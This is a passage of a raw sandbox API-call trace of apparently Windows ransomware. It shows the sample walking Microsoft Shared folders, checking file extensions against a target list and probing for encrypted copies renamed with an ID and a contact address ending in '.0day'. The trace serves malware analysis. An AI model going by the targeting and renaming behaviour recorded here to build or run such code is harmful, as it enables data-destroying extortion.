lstrlenW (lpString=".xls") returned 4 [0265.849] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString=".xlsx") returned 5 [0265.850] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0265.850] lstrlenW (lpString=".ppt") returned 4 [0265.850] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.850] lstrlenW (lpString=".zip") returned 4 [0265.850] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0265.850] lstrlenW (lpString=".rar") returned 4 [0265.850] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString=".bz2") returned 4 [0265.850] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString=".7z") returned 3 [0265.850] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0265.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.850] lstrlenW (lpString=".dbf") returned 4 [0265.850] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.850] lstrlenW (lpString=".1cd") returned 4 [0265.850] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0265.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0265.850] lstrlenW (lpString=".jpg") returned 4 [0265.850] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0265.850] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0265.850] lstrlenW (lpString="boxed-delete.avi") returned 16 [0265.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.480] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=31744) returned 1 [0266.480] CloseHandle (hObject=0x308) returned 1 [0266.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0266.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.483] lstrlenW (lpString=".doc") returned 4 [0266.483] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".docx") returned 5 [0266.483] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0266.483] lstrlenW (lpString=".pdf") returned 4 [0266.483] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".xls") returned 4 [0266.483] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".xlsx") returned 5 [0266.483] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0266.483] lstrlenW (lpString=".ppt") returned 4 [0266.483] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.483] lstrlenW (lpString=".zip") returned 4 [0266.483] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".rar") returned 4 [0266.483] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".bz2") returned 4 [0266.483] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString=".7z") returned 3 [0266.483] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.483] lstrlenW (lpString=".dbf") returned 4 [0266.483] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.483] lstrlenW (lpString=".1cd") returned 4 [0266.483] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".jpg") returned 4 [0266.484] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".doc") returned 4 [0266.484] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".docx") returned 5 [0266.484] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0266.484] lstrlenW (lpString=".pdf") returned 4 [0266.484] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".xls") returned 4 [0266.484] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".xlsx") returned 5 [0266.484] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0266.484] lstrlenW (lpString=".ppt") returned 4 [0266.484] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".zip") returned 4 [0266.484] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".rar") returned 4 [0266.484] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".bz2") returned 4 [0266.484] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString=".7z") returned 3 [0266.484] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".dbf") returned 4 [0266.484] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".1cd") returned 4 [0266.484] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.484] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0266.484] lstrlenW (lpString=".jpg") returned 4 [0266.484] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.485] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.485] lstrlenW (lpString="kor-kor.xml") returned 11 [0266.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.709] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=392) returned 1 [0266.709] CloseHandle (hObject=0x2f0) returned 1 [0266.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0266.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.709] lstrlenW (lpString=".doc") returned 4 [0266.709] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.709] lstrlenW (lpString=".docx") returned 5 [0266.709] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0266.709] lstrlenW (lpString=".pdf") returned 4 [0266.709] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.709] lstrlenW (lpString=".xls") returned 4 [0266.709] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.709] lstrlenW (lpString=".xlsx") returned 5 [0266.709] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0266.709] lstrlenW (lpString=".ppt") returned 4 [0266.709] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".zip") returned 4 [0266.710] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.710] lstrlenW (lpString=".rar") returned 4 [0266.710] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString=".bz2") returned 4 [0266.710] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString=".7z") returned 3 [0266.710] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".dbf") returned 4 [0266.710] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".1cd") returned 4 [0266.710] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".jpg") returned 4 [0266.710] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".doc") returned 4 [0266.710] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString=".docx") returned 5 [0266.710] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0266.710] lstrlenW (lpString=".pdf") returned 4 [0266.710] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString=".xls") returned 4 [0266.710] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString=".xlsx") returned 5 [0266.710] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0266.710] lstrlenW (lpString=".ppt") returned 4 [0266.710] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.710] lstrlenW (lpString=".zip") returned 4 [0266.710] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.711] lstrlenW (lpString=".rar") returned 4 [0266.711] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.711] lstrlenW (lpString=".bz2") returned 4 [0266.711] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.711] lstrlenW (lpString=".7z") returned 3 [0266.711] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.711] lstrlenW (lpString=".dbf") returned 4 [0266.711] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.711] lstrlenW (lpString=".1cd") returned 4 [0266.711] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0266.711] lstrlenW (lpString=".jpg") returned 4 [0266.711] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.711] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.711] lstrlenW (lpString="numbase.xml") returned 11 [0266.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.711] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=1218) returned 1 [0266.711] CloseHandle (hObject=0x2f0) returned 1 [0266.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml")) returned 0x20 [0266.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.712] lstrlenW (lpString=".doc") returned 4 [0266.712] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString=".docx") returned 5 [0266.712] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.712] lstrlenW (lpString=".pdf") returned 4 [0266.712] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString=".xls") returned 4 [0266.712] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString=".xlsx") returned 5 [0266.712] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.712] lstrlenW (lpString=".ppt") returned 4 [0266.712] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.712] lstrlenW (lpString=".zip") returned 4 [0266.712] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.712] lstrlenW (lpString=".rar") returned 4 [0266.712] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString=".bz2") returned 4 [0266.712] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString=".7z") returned 3 [0266.712] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.712] lstrlenW (lpString=".dbf") returned 4 [0266.712] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.712] lstrlenW (lpString=".1cd") returned 4 [0266.712] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".jpg") returned 4 [0266.713] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".doc") returned 4 [0266.713] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString=".docx") returned 5 [0266.713] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.713] lstrlenW (lpString=".pdf") returned 4 [0266.713] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString=".xls") returned 4 [0266.713] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString=".xlsx") returned 5 [0266.713] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.713] lstrlenW (lpString=".ppt") returned 4 [0266.713] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".zip") returned 4 [0266.713] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.713] lstrlenW (lpString=".rar") returned 4 [0266.713] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString=".bz2") returned 4 [0266.713] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString=".7z") returned 3 [0266.713] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".dbf") returned 4 [0266.713] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".1cd") returned 4 [0266.713] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 84 [0266.713] lstrlenW (lpString=".jpg") returned 4 [0266.713] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.714] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.714] lstrlenW (lpString="numbers.xml") returned 11 [0266.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.758] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=209) returned 1 [0266.758] CloseHandle (hObject=0x308) returned 1 [0266.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml")) returned 0x20 [0266.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.760] lstrlenW (lpString=".doc") returned 4 [0266.760] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.760] lstrlenW (lpString=".docx") returned 5 [0266.760] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0266.760] lstrlenW (lpString=".pdf") returned 4 [0266.760] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.760] lstrlenW (lpString=".xls") returned 4 [0266.760] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.760] lstrlenW (lpString=".xlsx") returned 5 [0266.760] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0266.760] lstrlenW (lpString=".ppt") returned 4 [0266.760] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.760] lstrlenW (lpString=".zip") returned 4 [0266.760] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.760] lstrlenW (lpString=".rar") returned 4 [0266.760] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.760] lstrlenW (lpString=".bz2") returned 4 [0266.761] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString=".7z") returned 3 [0266.761] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString=".dbf") returned 4 [0266.761] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString=".1cd") returned 4 [0266.761] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString=".jpg") returned 4 [0266.761] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString=".doc") returned 4 [0266.761] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString=".docx") returned 5 [0266.761] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0266.761] lstrlenW (lpString=".pdf") returned 4 [0266.761] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString=".xls") returned 4 [0266.761] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString=".xlsx") returned 5 [0266.761] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0266.761] lstrlenW (lpString=".ppt") returned 4 [0266.761] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.761] lstrlenW (lpString=".zip") returned 4 [0266.762] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.762] lstrlenW (lpString=".rar") returned 4 [0266.762] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.762] lstrlenW (lpString=".bz2") returned 4 [0266.762] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.762] lstrlenW (lpString=".7z") returned 3 [0266.762] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.762] lstrlenW (lpString=".dbf") returned 4 [0266.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.762] lstrlenW (lpString=".1cd") returned 4 [0266.762] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 76 [0266.762] lstrlenW (lpString=".jpg") returned 4 [0266.762] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.762] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x42c9068, Size=0x4000) returned 0x42c9068 [0266.762] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0266.762] lstrlenW (lpString="Monet.jpg") returned 9 [0266.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.340] GetFileSizeEx (in: hFile=0x2f8, 